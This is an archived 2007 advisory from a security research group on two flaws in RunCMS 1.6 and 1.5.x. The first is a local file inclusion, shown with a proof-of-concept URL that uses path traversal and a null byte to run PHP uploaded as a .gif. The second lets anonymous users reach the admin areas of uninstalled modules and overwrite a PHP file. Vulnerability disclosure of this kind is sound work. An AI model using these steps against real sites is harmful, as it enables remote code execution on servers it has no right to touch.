78 lines
No EOL
3 KiB
Text
78 lines
No EOL
3 KiB
Text
########################## WwW.BugReport.ir ###########################################
|
|
#
|
|
# AmnPardaz Security Research & Penetration Testing Group
|
|
#
|
|
# Title: RunCms Multiple Vulnerabilities
|
|
# Vendor: http://www.runcms.org/
|
|
# Bugs: Local File Inclusion, Modules Authorization Weakness
|
|
# Vulnerable Version: RunCMS 1.6 Halloween, 1.5.x (prior versions also may be affected)
|
|
# Exploitation: Remote with browser
|
|
# Exploit: Available
|
|
# Fix Available: No!
|
|
#######################################################################################
|
|
# Leaders : Shahin Ramezany & Sorush Dalili
|
|
# Team Members: Alireza Hasani ,Amir Hossein Khonakdar, Hamid Farhadi
|
|
# Security Site: WwW.BugReport.ir - WwW.AmnPardaz.Com
|
|
# Country: Iran
|
|
# Contact : admin@bugreport.ir
|
|
######################## Bug Description ###########################
|
|
|
|
Description:
|
|
--------------------
|
|
RunCMS is a comprehensive content management system (CMS) where ease of use,
|
|
speed, & flexibility are the main development key points.
|
|
RunCMS is a CMS coming from the cores of E-Xoops. E-Xoops 1.05r3 was the last version with the E-Xoops name.
|
|
|
|
Vulnerabilities:
|
|
--------------------
|
|
+-->Local File Inclusion (Remote Code Execution)
|
|
|
|
Code Snippet:
|
|
|
|
/include/common.php line#131-143
|
|
|
|
// ################# :: Register Globals Compatibility :: #################
|
|
$globals_test = @ini_get('register_globals');
|
|
if (isset($globals_test) && empty($globals_test))
|
|
{
|
|
// These still need some work :: Cookie|Server|Env are ok now.
|
|
if ( !empty($HTTP_GET_VARS) ) { extract($HTTP_GET_VARS, EXTR_SKIP); }
|
|
if ( !empty($HTTP_POST_VARS) ) { extract($HTTP_POST_VARS, EXTR_SKIP); }
|
|
define('_GLOBALS', FALSE);
|
|
}
|
|
else
|
|
{
|
|
define('_GLOBALS', TRUE);
|
|
}
|
|
|
|
/include/common.php line#276-280
|
|
|
|
// ################ Include page-specific lang file ##################
|
|
if (isset($xoopsOption['pagetype']))
|
|
{
|
|
rc_include_lang_file($xoopsOption['pagetype'].".php");
|
|
}
|
|
|
|
$xoopsOption['pagetype'] is not defined by default, so it's possible for an attacker to define
|
|
it by both $_GET or $_POST methods to conduct Local file inclusion!
|
|
Furthermore RunCms doesn't properly validate the content of user supplied Uploads!
|
|
Attacker could upload php codes with .gif extension and include it using above vulnerability!
|
|
|
|
POC: http://localhost/runcms_1.6/modules/news/?xoopsOption[pagetype]=../../images/avatar/users/[uid].gif%00
|
|
|
|
+-->Modules Authorization Weakness (Remote Code Execution)
|
|
|
|
There is a logical weakness in the Structure of Modules Authorization mechanism.
|
|
When a module is not installed by the site admin, anyone (groups of Anonymous Users) can access module’s admin area!
|
|
The most dangerous module in this case is newbb_plus which provide a form to overwrite disclaimer.php!
|
|
Form address example: http://localhost/runcms_1.6/modules/newbb_plus/admin/forum_config.php
|
|
Disclaimer address example: http://localhost/runcms_1.6/modules/newbb_plus/cache/disclaimer.php
|
|
|
|
Credit:
|
|
--------------------
|
|
Discovered by trueend5 (trueend5 yahoo com)
|
|
AmnPardaz Security Research & Penetration Testing Group
|
|
WwW.BugReport.ir
|
|
WwW.AmnPardaz.com
|
|
|
|
# milw0rm.com [2007-11-24] |